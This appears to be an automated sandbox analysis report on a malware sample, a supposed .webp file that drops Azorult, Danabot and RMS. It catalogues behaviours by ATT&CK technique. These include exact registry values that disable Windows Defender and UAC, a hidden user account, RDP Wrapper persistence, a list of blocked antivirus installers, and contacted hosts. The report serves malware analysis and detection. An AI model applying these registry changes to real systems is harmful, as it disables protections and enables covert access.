Analysis Overview
SHA256
a48de509cda096a6b13c6f51d7312ecdb42418610ef1e86631e638ce90ec7cda
Threat Level: Known bad
The file 20250322_162339.webp was found to be: Known bad.
Malicious Activity Summary
UAC bypass
Windows security bypass
Azorult family
Danabot
Azorult
Modifies visiblity of hidden/system files in Explorer
Danabot family
RMS
Modifies Windows Defender Real-time Protection settings
Danabot x86 payload
Rms family
Remote Service Session Hijacking: RDP Hijacking
Grants admin privileges
Downloads MZ/PE file
Sets file to hidden
Drops file in Drivers directory
Server Software Component: Terminal Services DLL
Modifies Windows Firewall
Blocklisted process makes network request
Stops running service(s)
Blocks application from running via registry modification
Modifies file permissions
Loads dropped DLL
Executes dropped EXE
Checks computer location settings
Checks whether UAC is enabled
Legitimate hosting services abused for malware hosting/C2
Password Policy Discovery
Command and Scripting Interpreter: PowerShell
Adds Run key to start application
Modifies WinLogon
Looks up external IP address via web service
UPX packed file
Drops file in System32 directory
AutoIT Executable
Hide Artifacts: Hidden Users
Launches sc.exe
Drops file in Program Files directory
Permission Groups Discovery: Local Groups
Program crash
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
Browser Information Discovery
System Location Discovery: System Language Discovery
Suspicious behavior: LoadsDriver
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Modifies data under HKEY_USERS
Gathers network information
Delays execution with timeout.exe
Kills process with taskkill
Suspicious behavior: SetClipboardViewer
NTFS ADS
Suspicious use of AdjustPrivilegeToken
Views/modifies file attributes
Enumerates system info in registry
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
Scheduled Task/Job: Scheduled Task
Suspicious use of WriteProcessMemory
Suspicious behavior: GetForegroundWindowSpam
Runs .reg file with regedit
Opens file in notepad (likely ransom note)
System policy modification
Checks processor information in registry
Runs net.exe
Modifies registry class
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2025-05-19 10:22
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2025-05-19 10:22
Reported
2025-05-19 10:30
Platform
win10v2004-20250502-en
Max time kernel
413s
Max time network
409s
Command Line
Signatures
Azorult
Azorult family
Danabot
Danabot family
Danabot x86 payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
Modifies visiblity of hidden/system files in Explorer
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Programdata\RealtekHD\taskhostw.exe | N/A |
RMS
Rms family
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\SysWOW64\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Windows\SysWOW64\regedit.exe | N/A |
Windows security bypass
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\regedit.exe | N/A |
Grants admin privileges
Remote Service Session Hijacking: RDP Hijacking
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\net.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\net1.exe | N/A |
Blocklisted process makes network request
Blocks application from running via registry modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
Downloads MZ/PE file
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\Downloads\Azorult.exe | N/A |
Modifies Windows Firewall
Server Software Component: Terminal Services DLL
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" | C:\rdp\RDPWInst.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\Control Panel\International\Geo\Nation | C:\ProgramData\Microsoft\Intel\winlog.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\Control Panel\International\Geo\Nation | C:\ProgramData\Microsoft\Intel\winlogon.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\Control Panel\International\Geo\Nation | C:\ProgramData\Microsoft\Intel\taskhost.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\Control Panel\International\Geo\Nation | C:\programdata\install\cheat.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\Control Panel\International\Geo\Nation | C:\programdata\microsoft\intel\R8.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\Control Panel\International\Geo\Nation | C:\ProgramData\Microsoft\Intel\wini.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\System32\svchost.exe | N/A |
Modifies file permissions
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" | C:\Programdata\RealtekHD\taskhostw.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Modifies WinLogon
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" | C:\rdp\RDPWInst.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
Password Policy Discovery
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\System32\rfxvmt.dll | C:\rdp\RDPWInst.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Hide Artifacts: Hidden Users
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | C:\Windows\SysWOW64\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\john = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_2031229069\sets.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Program Files\RDP Wrapper\rdpwrap.ini | C:\Windows\SysWOW64\attrib.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_84579926\automation.js | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_933065173\deny_etld1_domains.list | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1616464308\smart_switch_list.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Program Files\COMODO | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File opened for modification | C:\Program Files (x86)\AVAST Software | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\McAfee | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_84579926\manifest.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Program Files\AVAST Software | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Cezurity | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File opened for modification | C:\Program Files\Cezurity | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_933065173\manifest.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Program Files\Enigma Software Group | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_976953327\LICENSE | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GRIZZLY Antivirus | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_84579926\travel-facilitated-booking-kayak.js | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1559524024\crl-set | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_2031229069\manifest.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_976953327\keys.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1764881355\nav_config.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Program Files\Malwarebytes | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File opened for modification | C:\Program Files (x86)\AVG | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File created | C:\Program Files\RDP Wrapper\rdpwrap.dll | C:\rdp\RDPWInst.exe | N/A |
| File opened for modification | C:\Program Files\RDP Wrapper | C:\Windows\SysWOW64\attrib.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1764881355\manifest.fingerprint | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_2031229069\_metadata\verified_contents.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_976953327\manifest.fingerprint | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Program Files\ESET | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_933065173\manifest.fingerprint | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_2031229069\LICENSE | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft JDX | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File opened for modification | C:\Program Files (x86)\SpyHunter | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1715725482\manifest.fingerprint | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Program Files\ByteFence | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Panda Security | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_84579926\extraction.js | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1559524024\manifest.fingerprint | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1383799245\typosquatting_list.pb | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Zaxar | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1383799245\manifest.fingerprint | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Program Files (x86)\360 | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File opened for modification | C:\Program Files\SpyHunter | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_24898505\manifest.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1764881355\manifest.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\Common Files\System\iediagcmd.exe | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_976953327\_metadata\verified_contents.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Program Files\Kaspersky Lab | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1616464308\office_endpoints_list.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1616464308\manifest.fingerprint | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Kaspersky Lab | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_84579926\manifest.fingerprint | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_933065173\deny_domains.list | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_933065173\deny_full_domains.list | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_976953327\manifest.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Program Files\RDP Wrapper\rdpwrap.dll | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Program Files\AVG | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_84579926\classification.js | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_84579926\travel-facilitated-booking-bing.js | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1559524024\manifest.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1715725482\manifest.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1715725482\protocols.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_2031229069\manifest.fingerprint | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\RDP Wrapper\rdpwrap.ini | C:\rdp\RDPWInst.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
